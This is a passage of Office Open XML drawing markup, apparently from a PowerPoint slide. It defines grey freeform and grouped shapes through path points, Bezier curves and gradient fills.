                        <a:lnTo>
                          <a:pt x="3803" y="4725"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="101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9" name="Freeform 816">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C1DCD2-B2E2-46A6-BA13-8B3DA5DD8E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490" y="1811"/>
                    <a:ext cx="340" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                      <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                      <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                      <a:gd name="T4" fmla="*/ 0 w 4831"/>
                      <a:gd name="T5" fmla="*/ 100 h 1288"/>
                      <a:gd name="T6" fmla="*/ 368 w 4831"/>
                      <a:gd name="T7" fmla="*/ 0 h 1288"/>
                      <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                        <a:moveTo>
                          <a:pt x="4831" y="1189"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4460" y="1288"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="368" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4831" y="1189"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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0" name="Freeform 817">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B143631A-FA26-4F50-A23F-B8B14DFF23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155" y="2127"/>
                    <a:ext cx="675" cy="181"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 9603"/>
                      <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T3" fmla="*/ 0 h 2577"/>
                      <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                      <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                      <a:gd name="T8" fmla="*/ 0 w 9603"/>
                      <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                        <a:moveTo>
                          <a:pt x="0" y="1287"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9603" y="1287"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="2577"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1287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969696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1" name="Freeform 818">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B0B0E6-59A0-44B7-9901-6FA698D647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493" y="2218"/>
                    <a:ext cx="337" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4801"/>
                      <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4801"/>
                      <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T5" fmla="*/ 369 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T7" fmla="*/ 0 h 1656"/>
                      <a:gd name="T8" fmla="*/ 0 w 4801"/>
                      <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                        <a:moveTo>
                          <a:pt x="0" y="1290"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1656"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290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C0C0C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2" name="Freeform 819">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79FB357-0F2F-4EE5-BA49-429A2C03F0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155" y="2218"/>
                    <a:ext cx="338" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4802"/>
                      <a:gd name="T3" fmla="*/ 369 h 1656"/>
                      <a:gd name="T4" fmla="*/ 0 w 4802"/>
                      <a:gd name="T5" fmla="*/ 0 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                        <a:moveTo>
                          <a:pt x="4802" y="1656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1656"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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3" name="Freeform 820">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A36DB5C-FAE5-42D1-95DD-C352B35A41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251" y="2157"/>
                    <a:ext cx="457" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 6492"/>
                      <a:gd name="T1" fmla="*/ 654 h 1743"/>
                      <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                      <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                      <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                      <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                      <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                      <a:gd name="T7" fmla="*/ 0 h 1743"/>
                      <a:gd name="T8" fmla="*/ 0 w 6492"/>
                      <a:gd name="T9" fmla="*/ 654 h 17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492" h="1743">
                        <a:moveTo>
                          <a:pt x="0" y="654"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4061" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6492" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2431" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="654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C0C0C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4" name="Freeform 821">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3FF90D-B9BA-4B53-B3CC-AFF169F672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804" y="1894"/>
                    <a:ext cx="26" cy="357"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 371"/>
                      <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                      <a:gd name="T2" fmla="*/ 371 w 371"/>
                      <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                      <a:gd name="T4" fmla="*/ 371 w 371"/>
                      <a:gd name="T5" fmla="*/ 0 h 5071"/>
                      <a:gd name="T6" fmla="*/ 0 w 371"/>
                      <a:gd name="T7" fmla="*/ 99 h 5071"/>
                      <a:gd name="T8" fmla="*/ 0 w 371"/>
                      <a:gd name="T9" fmla="*/ 5071 h 50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71" h="5071">
                        <a:moveTo>
                          <a:pt x="0" y="5071"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="371" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="5071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C0C0C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61" name="Group 822">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB85D518-1D4C-4708-B6F3-F6B51F10500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160" y="1819"/>
                  <a:ext cx="110" cy="171"/>
                  <a:chOff x="2158" y="1204"/>
                  <a:chExt cx="419" cy="647"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1962" name="Freeform 823">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFDDE527-1EB8-424A-8580-FF82D15683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294" y="1592"/>
                    <a:ext cx="177" cy="231"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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3" name="Freeform 824">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{734E40E2-F53E-4D1B-965C-E0877A19F5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225" y="1575"/>
                    <a:ext cx="326" cy="276"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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4" name="Freeform 825">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A82875-BCA5-424C-934C-B1F740A078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158" y="1323"/>
                    <a:ext cx="419" cy="329"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
